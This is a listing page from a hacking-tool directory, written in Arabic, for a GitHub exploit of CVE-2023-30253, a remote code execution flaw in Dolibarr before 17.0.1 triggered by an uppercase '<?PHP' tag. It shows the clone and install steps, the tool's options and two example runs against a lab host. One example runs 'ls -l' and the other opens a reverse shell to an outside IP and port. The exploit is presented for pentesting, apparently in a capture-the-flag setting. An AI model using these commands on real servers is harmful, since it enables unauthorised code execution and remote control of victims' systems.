Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2023-30253 — Dolibarr قبل الإصدار 17.0.1 تسمح بتنفيذ تعليمات برمجية عن بعد من قبل مستخدم مصادق عبر تلاعب بالأحرف الكبيرة: استخدام <?PHP بدلاً من <?php في البيانات المحقونة. | Kitploit
أدوات/GitHubGitHub/rubikcuv5/cve-2023-30253
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHubrubikcuv5/cve-2023-30253

cve-2023-30253

Dolibarr قبل الإصدار 17.0.1 تسمح بتنفيذ تعليمات برمجية عن بعد من قبل مستخدم مصادق عبر تلاعب بالأحرف الكبيرة: استخدام <?PHP بدلاً من <?php في البيانات المحقونة.

عرض المستودع
7منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-30253

image

الوصف

يسمح Dolibarr قبل الإصدار 17.0.1 بتنفيذ التعليمات البرمجية عن بُعد بواسطة مستخدم مُوثَّق عبر التلاعب بالأحرف الكبيرة: استخدام <?PHP بدلاً من <?php في البيانات المُدرجة.

التوثيق

  • CVE-2023-30253
  • إشعار GitHub: GHSA-9wqr-5jp4-mjmh

الإعداد

root@kitploit:~
git clone https://github.com/Rubikcuv5/cve-2023-30253.git

pip3 install -r requirements.txt

python3 CVE-2023-30253.py -h

الاستخدام

root@kitploit:~
usage: CVE-2023-30253.py [-h] [--url URL] [-u USER] [-p PASSWORD] (-c COMMAND | -r ip port)

Argument parser

options:
  -h, --help            show this help message and exit
  --url URL             URL of the website
  -u USER, --user USER  Username
  -p PASSWORD, --password PASSWORD
                        Password
  -c COMMAND, --command COMMAND
                        Command to execute
  -r ip port, --reverseshell ip port
                        Reverse shell IP and port

أمثلة الإثبات

تنفيذ أمر

root@kitploit:~
python3 CVE-2023-30253.py --url http://crm.board.htb -u admin -p admin -c "ls -l"

image

الحصول على شل عكسي

root@kitploit:~
 python3 CVE-2023-30253.py --url http://crm.board.htb -u admin -p admin -r  10.10.14.17  4444

image

المؤلف

  • Rubickcuv
تنزيل الأداة